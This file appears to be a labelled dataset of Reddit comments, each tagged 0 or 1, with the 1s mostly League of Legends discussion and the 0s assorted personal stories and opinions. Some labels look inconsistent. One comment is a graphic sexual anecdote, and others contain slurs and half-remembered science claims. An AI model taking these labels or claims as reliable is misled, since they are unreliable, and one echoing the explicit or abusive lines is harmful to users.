1	THis is mostly because the new teams are basically just solo queue all-stars with little synergy (yet) who are only casusal acquaintances, versus teams where the players have known each other and played with each other for years, and have been practicing simply on teamwork the whole time, rather than just solo queue skills. So the new teams have a real easy time winning the lane phase and early game, because their individual skill is either higher, or unexpected (as in their style is a bad match for the veteran team's player). But as soon as team play becomes vital over individual skill (mid/late game, team fights and team based decisions such as baron or closing the game) these veteran teams are now the ones who have the upper hand, however they are still down in gold, sometimes vastly because they were hammered in lane. So it takes awhile for them to close the gap enough for them to out play the other side as a single unit, rather than beating them as 5 separate players. A really good example is Curse. I'm not the biggest Curse fan but they were very dominant early. This was because they were able to gain advantage early game against the new teams every single time, and since they are the veteran team with practiced synergy, they could easily close out their games, leading to stomp after stomp versus the newer teams, which lead to confidence and momentum that carried them to victory over the veteran teams. However CLG didn't always win early game against the new solo queeu allstars (they shine with s2 tactics and during mid game, when split pushing becomes a fearful tactic), but they had enough synergy to come back from it, so while they won frequently against the newer teams, it was never a "stomp, or an easy win, sometimes they even lost because they were to far behind and the solo queue allstars could end it like a solo queue game. Even now, at the end of the LCS split, this is still evident because these new teams have, at best, played for 4 months with each other vs the years the veterans have, although you can see more and more, these newer teams being able to clsoe games they get an early advantage in, it just hasn't become the norm yet.
0	I feel like im on the opposite end of this. I had a coworker in the air force who co owned a computer repair business. I hated my job in the air force and after a couple of year just did enough to get by. I always asked my friend if i could get a civilian job working at the computer repair store, mainly because that stuff is cool to me. Hell I know I would have enjoyed my job more. BUT he always told me no and eventually when a opening did come up they went with a store regular.   I'm not mad about it I understand from his perspective. I am now out of the air force and going to college. My buddy signed on for another 6 years and no longer works at the computer place. Life has a funny way of working out.
0	As someone who lives in Lancaster, Pennsylvania, and who comes into contact with the Amish (along with similar conservative orders of Mennonite) regularly, I feel like the reality of the Amish is somewhere in the middle between this meme and the idealistic ones: There's a lot to be admired about the culture and ways of the Amish, but not all Amish people are all that holy or admirable, and some of their practices do end up treating certain members/animals unfairly.
0	Gotta be honest here, cheating wouldn't be my concern here. It would really upset me that a) my husband needs such a break from my "bullshit" and b) that he felt i was such a battle axe that he couldn't talk to me about it.   I really want a partnership, with someone who is my friend most of the time. Friends don't always get along and i know living together causes problems between even the closest people, but i can't understand/improve if you don't talk to me.   Yes, it would initially hurt my feelings if my SO told me he needed time away, but it's likely i already knew my SO enough to try not to take it personally and, seriously, at least if he talked to me about it i could take solace in the fact that he trusted me to tell me. By hiding all this, yes OP will probably get accused of cheating, but at this point he's really setting her up to fail. There's no way any partner wouldn't have an emotional reaction to this even if trust (a hard thing to nurture when your partner is hiding even little  things) is there.
1	Worlds is after the Summer Split playoffs, last year they took place in November, so assuming the VU comes out in say.. 3 months, (September) that leaves the teams with 2 months to get used to it, this seems like a long time, but in reality there are things that you may not think about until the situation arises, and bugs that may not have been found, and it is a relatively new map. Additionally, they would, most likely, not include it in the Summer Split season games, and a jump from the old map to the new map in a matter of weeks for the teams that qualify for Worlds, in a competitive sense, could compromise team play and such.. Also who wants their team to lose at Worlds because of a lack of competitive experience on an updated map?
0	Let's learn about meat!   Cows and sheep have very dense muscle tissue, dense enough that the bacteria you generally find on steaks and lamb can't quickly migrate very far into the meat, they just live on the surface. Over time the bacteria can eat through it and make it go rotten, but unless your cow was horribly sick or your steak has been left out for a few days, heating the very surface of the steak above 160 degrees Fahrenheit (344.26 Kelvin) is enough to kill any dangerous pathogens. This really has little to do with regulations; it's not challenging to keep the interior of a steak relatively bacteria-free.   Burgers throw this rule out the window, because they're made of ground beef. Grinding up the meat moves all the surface bacteria around, permeating the entire burger. That's where meat industry regulations come in, hopefully ensuring that you won't get sick eating a medium-rare burger, even though you didn't cook it enough to kill all the bacteria at the center.   With chicken and turkey, the muscle tissue isn't dense enough to prevent the spread of bacteria, and a large percentage of commercially-bought chicken and turkey meat has salmonella on it, which permeates all of the meat, so you have to cook it all the way through.   Pork can contain Trichinella spiralis, the roundworm that causes trichinosis, which can be fatal. T. spiralis dies at ~150 degrees Fahrenheit (338.71 Kelvin), so even questionable pork is going to be safe if you cook it all the way through. People still get trichinosis from eating undercooked wild boar here, but the regulations are good enough that it's safe to eat medium cooked commercially-bought pork.
0	This is why the best way to zip through college and many of those biased GE courses is to tailor papers to the professor's opinion. I once had a polysci professor who told us white males get everything handed to them on a silver plate, so naturally I wrote my paper on how I don't have to work hard because I get everything handed to me.
1	Different people probably call it different things. It's revolves around knowing how many turret shots it's going to take to reset the lane, and how many minions are behind your push.     We know casters take 2 towers shots and melee 3. We also know that turrets have a static .83 Attack speed (inhibitor towers rest at 4 ATK/second).   We also know minions take 25 seconds from spawn to reach our side lanes tier 1. Knowing these tidbits even rounding tower shots time to 1 ATK/Second can really help players figure out if minions are going to reach the lane before the tower has ample time to clear them out.     "Knowing your push count" basically means "Knowing how many of each minion are present in my push". With 7 casters and 4 melee you know you're going to take about 26 shots.   26 shots /(divided) .83 ATK/Second= 31 seconds (I just average 1 shot per second in game for simplicities sake. After a while you're doing it all naturally without any real thought.)   31 seconds is how long it will take for the tower to clear your push in this scenario. If the value exceeds 25 seconds and a fresh wave has spawned, or 10 seconds and the enemy wave is at their tier 2, you know that the lane won't reset after you go B and will be pushed in their favor.   That's going to take your enemies tower well over the 25 seconds it takes for the enemy minion wave to get to lane off a fresh spawn, so if your HP permits you should be extending past the turret and catching this wave before it reaches your minions to maximize both damage to the tower/guarantee the lane resets before you return.
1	He doesn't relate to ANY other given hint at all. Riot is smart enough to not reveal something like this with a filename. It may be a veigar skin, sure. Not Ultimate.
1	Last season they let you have the rewards of your maximum attained tier, but this year they implemented a way to never drop (unless you go inactive). In doing this they made it so everyone who is active in ranked will obtain the rewards of their maximum attained tier.
0	I'm not entirely sure what you should feel guilty about. I don't know what it is about people treating roommates like they're instantly best-buds or something. It's a commercial transaction that functions, like most business, best when there's a healthy dose of civility and flexibility. And, like most business transactions, confusing a polite smile for friendship tends to run things into the ground.   Most of the roommate woes I hear tend to come from people whose roommates treat them like / have expectations of them like they're friends for some subset of things, and treat them otherwise for other things.
0	My parents also went through a nasty divorce when I was about the same age as you. Through the divorce my mother was nasty and took up the role of the villain, while my dad was just, well, bummed… I found out that my mom had cheated on him when a random dude showed up at the front door to tell my father what she had been up to (naturally I was tucked behind the corner listening to the whole explanation)   I had always been fonder of my dad than my mom, but now she was my number one enemy. My dad worked really hard to keep us all comfortable and happy, and here she was running off and ruining our family.   After the divorce I was cruel and rude to my mom, and supportive to my dad. Why wouldn't I be? She cheated, she was a bitch, and he was a cool dad who made all the money. But, I was unaware of the financial faults my dad had made, the fact that he lied to my mom about their finances for years, and that he ended up getting our house foreclosed on because he refused to sell year after year even though my mom pleaded with him to do so. My dad had put my mom under unbelievable stress, and I expected her to suck it up and sacrifice her sanity/happiness to keep my ideal family running smoothly. After allowing my anger to cool, and having honest conversations with my parents about what had happened I don’t hold anything against my mom for what happened.   I’m not saying what you did was wrong or unjustified, But I can’t help but think if I had reacted this stubbornly and never given my mom the chance to redeem herself after she cheated, that I would have lost a great parent and friend, and the idea of that makes me sick to my stomach. For this reason, I sincerely hope that your mom is the monster you make her out to be, and not just someone who was in a degrading relationship and made a rash decision.
0	Growing up in a religious household with parents who express high expectation for their children, it was very hard for me to admit to them about my drug abuse problem. I was afraid they would react very negatively against me. My mom didn't understand, but she helped me get back to normal. My dad actually had the same issue when he was a kid.
0	Dunno if you will see this or not but ill give you my advice from someone who has done almost the exact same thing.   My Story  6 Months out well better start running slowly running more and more get to about 1.5 months out and have to take a trip that lasted a week didnt run at all on that trip. Got back with about a month left decided not to run for a week because I had so much fun on my trip. 3 weeks away man I just dont feel like it. 2 weeks away well too late to do anything now. I think the most I got up to was like 15 miles. 6 weeks prior... Even better part I decided to go out with a bunch of friends that were running as well and have a couple drinks... 4 Long Island Ice Teas later im drunk and am like 'oh shit I have to run tomorrow" SO I wake up the next day and yeah you guessed it running with a hangover. First couple miles were okay lots of people excited made it pretty easy. Wasnt really drinking because man ill drink when im thirsty and the poweraid shit they had was terrible. Got to about like 8 or 9 and already have a blister starting. This is where is starts getting hard. At mile 10 there was the turn off for the 1/2 marathon and I wanted to go that was so bad but fuck it I paid money for this race im finishing it. Mile 12 Not having water and power aid caught up to me and im only really walking at this point. Living off aid station to aid station getting poweraid and water. Mile 13 and 14 I wanted to die. Tried to do 1 min running 2 min walking and was killing myself with it. Luckily for me I was running with my Father at the time and he brought power gels, salt tablets, asprin, all the stuff you might need. We walk till about mile 17-18 when I was feeling better and got some salt back in my system along with the water. Running for about 5 min at a time not walking for a min or 2. Did that till mile 20 or so and the crowds start picking up again looking at the timers on the course I'm at like 5 hours at 21 miles and hell if im not going to be under 6 hours. I start running more and more cheering on other people that are walking trying to have as much fun as I can in this shitty situation that I got myself into. I got to mile 25 around 5:45 and ran then entire last stretch. Im proud of myself for running a 10 minute mile there finished and got to the best damn part. The food at the end oh my god literally the best food I have ever had. It could have been terrible at this point anything tasted amazing. Had a couple recovery drink oranges, bananas, cookies, beer, and some flatbread pizza they were giving out. Get my finishes medal and straight to a burger joint. Literally all I could think about was a burger and how bad I wanted one on this run.   Anyways aside from my story here are my tips:     Find a friend to run with.  Seriously find someone who is running around the same pace and make a new friend help them and help you. Hell even running running past people and encouraging them will go a long long way.     Walk the Hills  Its not worth it it just tires you out and you are trying to finish it not run a good time.     Band-aids on your nipples  Shits to fun to the those bleeding.     Dont give up  There are going to be times where you want to stop. Just keep putting 1 foot in front of the other you can do it.     Think about the ending  You are going to want something at the end when you are running. Just keep fantasizing about it at the end of the run. The running makes it 1000 times better.
0	There's a kid from high school who is really attached to me because I'm one of the only people who ever wasn't mean to her/accepted her when she came out as trans. But honestly while I wish her the best in life I have absolutely no desire to hang out with her. She keeps trying to invite herself to stay in my apartment (in another city), or to hang out while I'm visiting my parents and I always tell her I'm too busy or whatever but she keeps asking.
1	first of all, she applies tons of pressure just by being in the game. The terror of a stealthed Eve ganking you basically means that it's a huge risk to push lanes without investing tons of money in stealth wards. In addition to that, her flanks are amazing. You will often see her sneak behind the enemy team in teamfights, then hitting enemies with her ult (which usually hits maybe 4 enemies) which grants her a massive shield and allowing her team to engage on the slowed targets.
0	Definitely had a girlfriend several years back with the train of thought that "the man should pay for everything" kind of deal. After I pointed out that she had yet to take ME on a date, even on my own damn birthday, she pulled the "You're the man. The man pays for everything" schtick.   After I pointed out on several that times are changing and that a lot of people are getting out of that kind of mind set when it comes to relationships, she bluntly said that if I wasn't willing to be THE provider in the relationship that I should leave. So I did. And that was the end of that, thankfully.
0	Yea we have a tenant in our small building who turned her 1br/1ba into a druggie motel for her model and musician friends. As far as I know I think she had as many as 5 people total in that tiny places and they destroyed the apt. She actually moved out because of how disgusting it was and started subletting to them. Within the next few months she ran out of money and got evicted. She was even at one point tried to clean the shithole up and put it on airbnb to finance the rent controlled price of that apt, the cheap rent of her other dump, and her car payment. That sure didn't work.
0	Will they? Will they really?   Yep, I know your Mom told you that you were a special flower but realistically if you think you're the only one with the capablity, drive and skillset then you haven't looked around much. Hell, Reddit is full of Grads working in Starbucks waiting for a decent job.   However, you're welcome to do things whatever way you want. It just does no harm to try and take the perspective of the person you're sending your stuff to and try and walk a mile in their shoes.   I know you think you're awesome but out of those 500 CV's there aren't too many applicants that don't. Oh, and most CV's are artificially inflated bullshit with 75% of stuff that isn't of interest or use. Yes, I hear you, you're definitely the one that isn't, but there's still 499 others and no employer wants to wade through all those.
1	All i can say is dont focus too hard on winning your lane. I would recommend you to play maokai a lot for now, since his tps/engages are more reliable than sion. If you feel like you can win your lane without jungler interference then by all means go for it and look out for tps, since if the jungle is not ganking you he will probably gank mid/bot and you can countergank with tp. What you can try to do is if the enemy mid lane is immobile, just push out your lane fast(which is very easy with maokai) and go for a gank attempt on mid with your W. Do not hesitate to lose some cs sometimes to win a fight somewhere else. This is soloq a marginal cs lead of your top laner means nothing if you just killed 3 guys bot or the enemy mid laner. But the most important thing is, especially since you play tanks, is to actively think about which fight to take and what to do in the teamfight. Is it better to engage their backline? should you engage somebody in their frontline with W and back off to peel with Q? Cause in the end it all comes down to teamfights. Always go through scenarios, try to imagine where the enemys are and how they will want to fight. Constantly think about whether you hard engage and zone or peel.
1	Personally i disagree. I do agree veigar got overnerfed however the nerf on his E is well deserved, the E skill is the only thing i don't wanna see buffed(maybe sligh delay decrease). Yea, E is slow(still faster then nami Q) but still a strong AOE stun and it still is a strong skill.
1	Man, there is no Elo Hell. Watch high elo streams, they get AP Shaco's, AP Tristana's, solo lane Taric's, Solo lane AP Janna's all the time. They get trolls, ragers and feeders just like you. NoS gets access to high elo accounts all the time and troll games frequently. It's not exclusive to you. I'm just a 1200 player too, but I believe if you belong higher you'll get there if you play enough games. Some teams you just can't carry.
1	If anyone remembers, Regi's other brother Jonas stepping in and helping them out was what led them into their glorious four LAN victories in a row. They really need someone like him to come into the house and discipline them. CLG has Kelby, Curse has Liquid, and they're doing better I think. TSM needs to get their shit together and I think a good manager would do it. Regi  does way too much right now: he's their manager, he runs the solomid.net website, and he's the AP mid player. That's way too much responsibility, he needs to focus on his playing more.
0	One time I went to meet an internet date at a Mexican Cantina in Napa, CA. The original date flaked so I was stood up and now alone at an unknown bar. I seen this cougar in the back playing pool and was like fuck it, I'll chat her up. She was a tall blonde Amazon. So I make small talk and have a margarita with her. We get chips and salsa. We go play another game of pool. This time she is grinding dat ass on me as we play. I was a closer at the time, so I say let's go back to your place. She says cool. We grab some beer on the way to her place and some condoms. We get to her place. Tiny condo. See pictures of her with two black kids. 4 of them. They're all hers. Start smoking weed on couch. She starts blowing me. I stick my hand down her pants on her ass. Start fingering pussy. She says let's go upstairs. Go up to her room. We both strip. Get in bed. I start going down on her. Then slide a finger in and massage her g-spot a bit. Then two. Then three. Then WTF 4? Then I cross the Rubicon and tuck my thumb into that shit. 5 bro, 5 is now a fist! No shit gentle reader, I was in 6" past my wrist when she came. It was like an out-of balance washing machine.
0	I went to a party once thinking I was gonna take this girl home. Later that night, the softball team she was playing for came over and little did I know her "girlfriend" was on there. It wasn't immediately made clear to me she was dating a girl.   She ditched me at the party to hang with this girl. I was ok with it at first seeing as the girl she was hanging with was hotter than she was. My girl was sitting in her lap all night and they would start making out off and on.   At first I was excited because it was looking more and more like I was going to have a threesome, but it was also confusing to me that she more than sketched out on my ass to be with this girl.   Fast forward to the end of the party and SHE LEAVES WITH THE SOFTBALL GIRL. The sneaked out on me so I immediately get frustrated and call her. After trying to convince her to come back for like 20 drunken minutes, she finally comes out of the closet to me and says she's a lesbian.
1	i play in diamond 1 and nidalee needs some tweaks, theres a reason why i ban her every game i'm in.   it doesn't matter if your mirco is bad or incredibly good if your defending a tower and nidalee is chunking spears  eventually  you or your teammate is going to get hit then, there's truly no avoiding it 5 people at a tower and nidalee throwing spears its going to happen sooner or later, even pros get hits by spears constantly you truly cant avoid every spear. And then when you do get hit by a spear one of these will happen.   A) you a fight a team fight with someone that has 1/4th health.   B) your teammate goes back and now the enemy dives 5v4.   IMO nidalee is a fine champion i just think her spears are literally stupid to have in a game like league, also her spears have 0 risk.   I wouldn't mind if they nerf her spears but then give her armor/MR back, she will need it but as of right now her spears are just stupid with literally 0 counterplay, a banshee veil has a 25 second CD and one of nidalee's teammates can probably easily poke that off.
1	Well, here's my pitch, and I hope I'm not too tough on you but I want to help. My usual response to people looking for advice is to  play  the game more, because experience will lead toward improvement. I checked out your profile and you have plenty of said experience, but something apparently isn't clicking for you.   At this point I have no doubt that your cs and basic mechanics are intact and just dandy, but what I suspect may be your issue is when it comes to making the so called "grand decisions" of the game. Every game is determined by a few important actions/turning points, but you're only in control of your own. I think mechanically you match or exceed everyone where you are right now at your skill level.
1	It currently includes 375,000 Summoners who have participated in ranked. While that is not everyone, it should give a pretty good indicator.   Don't underestimate the number of players hovering around that Elo. Currently in my database, there are 209,758 players below Mimiko's Elo, but are above 1200 Elo. There are another 80,000 players below 1200 Elo. Only 84,000 Summoners are above Mimiko in Elo.
1	Stay back until most of the cc/burst is used on others, melt the squishiest person closest to you.  Who you should focus is different based on team comps, but just do your best to stay alive while dealing as much damage as possible to the other team.
1	Not to feed anything but seriously? Avicii is one of the most popular electronic producers in the history of the genre and just because he recently (the last two years) started to get played on the radio doesn't diminish his producing skill.   He was headlining festivals before Levels came out in 2012 and  to quote an aritcle  and you know it's an Avicii song due to that very sound and the way he structures his song.   I don't even like the guy that much but saying he's not a legitimately talented produced is like saying Skrillex ruined dubstep and is a terrible producer and can only do bro-step blah blah blah
1	Autoattacking is a fine art. My turning point in this game was when I was told not to autoattack creeps so much, and explained why it was bad(this was maybe 100 games in for me).   So you seem to recognize that you want to let minions push. But... if the enemy is autoattacking and you aren't, then creep waves do build up. This is when you need to autoattack back. Either make sure you're still last hitting, or, as an example, if you're Malphite, hit all the creeps below half, Groundslam, and get all the kills.
1	Yes, but after that I lost all hopes in Riot if they ever gonna ban anyone. Also back in the day was glitch with Mobile RP, it wasn't so popular but as well, no one got banned. Basically from what I've "learned" -> lots of people stole from them -> no consequences at all, while they said they gonna ban everyone who abused it. Also I feel bad myself that I didn't use that glitch, my friends got over 60k RP on every account... That's why I completely don't trust Riot anymore, when they say they gonna ban anyone anymore. Tribunal bans are automatic, but perma ban isnt.
0	I did something like this one time... not really. Well I was driving home one day from work at like 10am since I was there at 1am. And being up since the day before at 9am. Well my brain went full retard on me and the idea popped into my head that well, if I keep my hands on the steering wheel, It would just autopilot it for me. I caught my logic pretty fast after closing my eyes for like 3 seconds.
0	Story time. I used to work Ravens games and used to hang out in the security office.  One game we get a call that this dude lost his cell phone. We check the lost and found and nothing was returned. Same guy calls ten minutes later saying some guy found the phone and is demanding $200 for it and wants to make the exchange at some set place and time. Three Baltimore police officers, surely there to just to watch the game, stand up and march out of the office. Poor guy probably got his ass handed to before going to central lockup.
0	Accountants don't make their money doing returns for middle class individuals. 1040EZs as is are so easy a trained monkey could do them. It's not hard to figure out what you will pay. Hell, there's even calculators online that can give you a rough estimate.   And you'd still have to figure out what you owe based on your paycheck withholdings. Which is exactly as much work as a basic filer does now.
1	nice write up :) Although it may have been implied, you might add in the support tips to buy wards with all your extra cash after you buy.  So many supports will just get ruby sightstone and not buy anymore greens.  If you spend all your extra cash on pinks thats cool, but in some cases I like to buy a full 5 stack (or 2 sometimes!) of greens and just litter them everywhere as I move around with my team.  This is especially good in solo queue, where unless you have a lee sin jungle, lots of times you're the only person that buys ANY WARDS after the lane phase.
0	You may be an exception though.  Think about it: the people who work for insurance companies have to make money somewhere if not just to cover expenses.  That means that you may have a lifetime limit on medical costs, you may have a super high deductible that is really difficult to meet, and others may be supporting you through much higher monthly payments because they aren't in ultra good health to begin with meaning they go to the doctor more than once a year.  Insurance companies aren't welfare, if that's anyone's job it's the government's.   It's ironic that you imply that insurance companies are essentially handing out money when your original complaint was that Europeans think their healthcare is free.
1	The issue here lies with you. You've admitted to having only spent 2 matches in that game (you might even be lying for all I know) and yet speak with such authority as if you know everything about it. Spell effects in Dota 2 are vastly more distinctive and detailed alongside heroes' animations (they go out of their way to rework spell effects and animations from time to time). A Tidehunter lets loose his ultimate and giant tentacles emerge from the ground while everyone gets knocked up. Windranger fires a magical arrow that flies brightly across the screen (you hear a charge up and release sound). Bloodseeker ruptures a poor soul rending them with blood squirting all over (you can even hear dripping). Sven unleashes a powerful cry and turns red with rage. He throws out his magical gauntlet that when landed makes a powerful crackling noise. How is any of that not clear to see (or hear)?
0	i mean, im not bold enough to ask for a three some with another couple, however, i have asked others to do that with my SO and i. but that all depends on how close you are in the friendship and whatnot, that part varies per person.   as far as the sperm donor thing, dont just say OK because youre a nice guy!!! that's a HUGE thing. no matter how close you are, if you arent comfortable donating, dont do it just because she begs you or youre best of friends. besides the fact of you having a kid that truly wouldnt be yours, you'd be seeing the child and that may get strange for everyone. and by all means dont do it because your friend is the one getting pregnant(you may have an idea that you and her are having a child together when really that isnt the case and its just a creepy way to think of it all). sorry to rant..
1	I don't really understand why they came out with this whole system. I really liked how they added the different tiers (i.e bronze,silver,gold,plat and so on) but still kept the original ELO standard. It gave me more initiative to play ranked. But now with this league system, winning just doesn't feel as satisfying as it used to. I just don't like being assigned to some silly group named after a champion with like 40 other people.   I also Don't like how they've put a glass ceiling for players, Get to challenger tier GG. With the previous system players had virtually limitless potential and the ELO bar could go as high as we saw fit.
0	In NYC, I was chilling outside a bodega when a lady tied her two pitbulls up to a hydrant and went inside. They seemed well behaved enough until a tiny dog walked by, one of the pitbulls lunged and bit onto the tiny dog whose owner flipped a shit (understandably) I told her the owner of the dogs was inside and she raised hell. The little dog was okay, but the pitbull looked upset, almost as if it knew it'd done something very wrong.
1	Why do you have this crazy idea that being unpleasant, tomboyish and "rudely honest" means that you're the "good kind" of "girl gamer"? You're just unpleasant to talk to, your attitude is disgusting, and the way you ride your high horse around the league scene is just disturbing. There are high-elo streamers who are actually better than you at this game but they are much more humble, friendly, and generally they are easily approachable and people can relate to them; people can ask them for advice or questions, they never put themselves above the other players of league. Even if those streamers have fans who disagree with them, there is no real hate, everyone walks away and they forget about it.   Reading through all your stuff in recent light, I just feel like you have lost your positive reputation (if you had any to begin with) and now you're trying to win it back by posting in a balls-out perspective. It's like you are trying too hard to be seen as the anti-stereotype girl league player. Somehow you think you are setting a leading example of how girl league players should be, but I hope no one ever follows your behaviour.   I was one of the few people to have been on the first few pages of your official streaming thread on the league forums, I wanted to watch your stream to learn from your supportive plays, because I had wanted to become a main support. A few months after the thread was posted, I stumbled across it again and saw it online. It was the first time I would have been able to watch your stream live as I live in a 10-hour difference timezone. But I just couldn't stand it. Even I could see that sometimes you made a mistake such as going neck-deep into the enemy jungle to ward when they were all MIA and suspected to be at their red (as they were getting ready to take baron). You ran up to the wraith camp to place a ward and got super-pwned by all 5 of their team; someone in chat said "come on", you insta-spammed back with "DO YOU WANT TO DO BARON WITHOUT A WARD YOU FUCKTARD DONT BLAME ME FOR DYING FOR DOING MY JOB MAYBE YOU SHOULD HAVE BOUGHT A WARD AND PLACED IT INSTEAD OR CAME WITH ME". The least you could have done is just said sorry to your team and move on with the game but you started raging the rest of the way because you were thinking too much of your ego, and didn't want to be seen as the player who made crazy game-throwing mistakes. You were way too distracted with trying to set an impression as a female gamer.   Overall I think you are too defensive over what people say and generally it's hard to think that you are a good person when you consistently lash back because you are waaaay too worried about your reputation as a female player. If you were just a male, these comments about you -- you would just take them as feedback, but instead you have this crazy obsession with preventing people from tarnishing your reputation that you've become one of the least-liked streamers of league.. The fact that you are a girl shouldn't even matter and quite honestly I am tired of hearing "female" "girl" in every one of your posts. inb4 you attach a facebook link to your profile with a generic photograph that contradicts your argument completely.
1	Pen is great on champs with high base damage because it causes the damage you do to ignore more armor. Since you have high base damage you dont need more damage, just a way for that damage to get through.   AD allows you to have higher base damage which is very helpful for last hitting.   AP(and AD) are great with abilities that maybe dont have high base damage but have good scaling because the bonus AP/AD with amplify your skills damage via the scaling.
0	While I see and mostly agree with the point, the problem lies in the fact that getting real results from anything less than this is nearly impossible. That is something that needs to change. We need effective groups for police oversight, who can and will take action when action is due. We need to do away with the bullshit police investigating police policies. We need to ensure that officers are at least held to the same standard as every day citizens, and if they commit a crime they are charged in the same fashion, with every single piddly little charge that can possibly be tacked on just to get things to stick. We need DAs who aren't making backroom deals and not pressing charges against officers. We need juries who see past the fact that there is an officer on the stand testifying, and see that just as anyone who is covering their ass, police will lie with impunity. We need judges who won't just give officers the lightest sentence possible. We need to have prisons that treat officers who do get locked up like real prisoners instead of a buddy who gets all kinds of perks.
1	Agree 100%!!! WHY EVERY NEW CHAMP HAS KNOCK UP???????????? Maybe 10 of 15 new champs... Kalista, Azir, Gnar, Vel'koz, Yasuo, Atrox, Zac, Tresh, Vi, Nami.   Remove once for all tenacity from game!!!!
0	Holy moly. Been looking for something that has mostly physics/astrophysics. I thought I knew all the good chans; PBS, NGC, (former)TDC, BBC. I just downloaded a torrent of 300 BBC Horizon shows a couple of weeks ago,from about 1984 to present. They have been pure quality since way back then. Interesting to see them all back to back, I encourage everyone to check it out. There are probably more than 300 of these, but that's the biggest collection I could find.   Edit: oh yeah, the reason i posted: One of the shows claims that they have actually measured the existence of a 'parallell universe right 'inside' ours in a way; supposedly it gives off a radiation that only a nearby universe could emit. (IANAAP). I mean, I've heard 1000 theories about parallel universes and multiverses; but here's a bearded guy pointing at some device and says 'yeah its there'   Another one claims they know what dark matter is; they nonchalantly say its two bosons coupled together so that it doesn't react with normal matter (much like neutrinos) but still is related to normal 'our-universe' gravity; hence we get these huge galaxies that we have and we can now explain it.(Me still IANAAP, probably don't remember the correct terms here)   But I thought we were far, far away from knowing this. (I just find these things extremely interesting, even if I have no idea of about the actual maths behind all this.)   (IANAAP=I am not an astrophysicist.)
1	Wrong flair for this :) Graves is a early - Mid game AD with okayish lategame   If let graves and vayne 1v1 from lvl 1 on graves will hit vayne hard til ~ 2 complete items on vayne and a good graves wont push the wave to you , so he stays relevant for longer , because 3- 4 item graves > 2 item vayne if both approch 4 damage items vayne will shit on him for sure but til this point the burst ad should win against the behind hypercarry
0	When my cat looks at me like that tiger he wants to play... so I rub his belly and for about .5 of a second he enjoys it and then he attacks the hand...
0	But now you have raised a good question. What is more humane? Forcing someone to live their whole life in prison with no chance of parole, or death? The term "give me liberty or give me death" comes to mind when I ask this question. Some would find it much more humane to be put to death then to never see the light of day again.   Is it more humane to allow someone to imprisoned for their whole life? What if they would rather die then be stuck in a cell forever?   There is a a larger moral question here. When you put "inhumane" in quotations like that, i feel like you aren't really thinking about it in a larger view.   Now one might argue, that prison life can be not bad. Free meals and Healthcare. But you still aren't really free to control your life. Even the most luxurious prison can by some still be viewed as worse.   This is a point of view you don't really hear to often though. You tend to hear from those who are pro death penalty about the cost of imprisonment and other burdens of life in prison. While you hear from the other side that killing someone for a crime is unacceptable.   But no one really talks about the moral imprecations of forcing someone in a cage for life and if it really is more just to do that over death in the case of no chance for parole. And I find it interesting that no one really takes that stance in an argument. Not to say it hasn't been explored before. Star Trek TNG did an episode about imprisonment. A soldier forced to live on a rather comfortable planet would still rather die then not be allowed to leave if he wishes. I know I've seen or read about other fictional cases but I can't say I've heard any real person try to make such an argument.   I'm not really saying one is right or wrong, and certainly the issues brought up such as the costs of up keeping prisons and the morality of killing someone for a crime is something to be addressed and there is no real right answer to these issues. But from a moral point of view, It is interesting that you hear about the lack of morality it takes to kill someone for a crime, but you do not hear the same argument or at least if you do, not very often, for life in prison.
1	Fiora Tweaks/Rework   So me and my friend theory craft possible champion reworks.   The one wich I enjoyed discussion the most was on Fiora.   We think that her passive is what is truly wrong with her. Maybe to some of you may come as a surprise that Fiora as passive. I know right? I was shocked too. Although it is not THE WORSE passive (hi Kog/Zyra) it just feels underwhelming and it feels too underpowered. Health regen? Really? Her name is "The Grand Duelist" and she gets health regen?   What we think her passive should be?  Something along these lines (subjected to proper tweaks of corse)  Every time you get hit you gain a Riposte Stack (they decay over time). When you have seven Riposte Stacks the next basic atack you get hit, returns full damage/200% damage to the adversary (if 200 maybe the 7th stack decays faster)   Now that we have finished looking at the passive lets look at Q.  We think Q is in a good place  If anything with the tweaks to passive Q may need a slight dmg nerf, but rather wait and see if she does.   So with the changes we propose W looses active - for active we want have a few ideas  - First off it is an auto atack reset that marks the enemy. This mark allows Fiora to do extra damage with each basic atack do the enemy to a period of 2 seconds. This is the one we enjoy the most since it will solidify her role as a duelist. Second idea is a  Reverted fling  I actually really like that, it makes her feel like a Zorro, while allowing her some mobility. What this makes is frienfly stuns target, kinda like Quinn's E, and during that stun you jump over the enemy. If the enemy is near a wall you actually do a flip over the wall. Third is sort of a "disarm" active which allows us to "blind" the enemy. Most of us don't like this idea cuz we think blind is a bad mechanic.   Fiora's E might need some number tweak in case her current kit shows to be too strong, but overall we would like to keep it that way.   Fiora's ulti we think is in a good place. I would actually find really funny if her ulti released her of all cc andafter the ulti ends she still gets the cc. Example: Taric stuns her. She will be stunned for another 1.5 seconds but she uses ulti. her ulti activates as normal, but when she is done she still is stunned for 1.5 seconds.   Please give feedback!!!
1	I think this is an interesting topic.  Whenever I have reviewed tribunal cases, I am always confused as to the extent that 'verbal abuse' and similar should be regarded. I also am unsure whether people review the cases in the same way as I do.   I check the exact reason that the person was reported for. If this happend to be 'intentional feeding' then I look at the stat and compare it to the rest of the time. If it is not obvious (1:2 or less ratio) then I review chat. More often then not, the person will literally right "Then I feed" etc. If the person writes this, along with spams of "lol see" etc. Then I will agree with the reporters that it was intentional feeding. They put themselves in that position. Although I believe others won't review in the same way, they will look at 4/7/3 and say "that isn't  intentional  feeding, just poor play.   Also I find it ambiguous as to what gets classed as 'verbal abuse'. I mean, obvious taboo slang is in there; but what about standard insults: "noob" "ur terrible" "wtf? u suck". Are these considered verbal abuse? If I look at it like my job, then I would say that any person found using such terms between peers in a manner not intended as light hearted is indeed abusing the person verbally. Should this standard be expected in a game? I'm torn. It's not an office, but it's also not a place I want to spend my time if it is allowed.   I think the result is that I think less about it and simple step away from the game for a while. :)
1	Well you're close anyway with that description. Because of the effects of gravity, blood tends to pool in the veins. This is normally counteracted by contraction of the leg muscles forcing the blood up through veins back to the heart. When you sit on a plane or playing a video game for hours, however, the blood just sits there. This can lead to deep venous thrombosis [DVT] (blood clot in the veins of the legs), especially if there's preexisting damage to the blood vessels (e.g. recent surgery) or your blood clots easily (e.g. certain medications). You won't have a heart attack from this since DVT is on the venous side and heart attacks result from arterial disease. However, pulmonary embolism, a severe and potentially life-threatening disease of the lungs, CAN result.
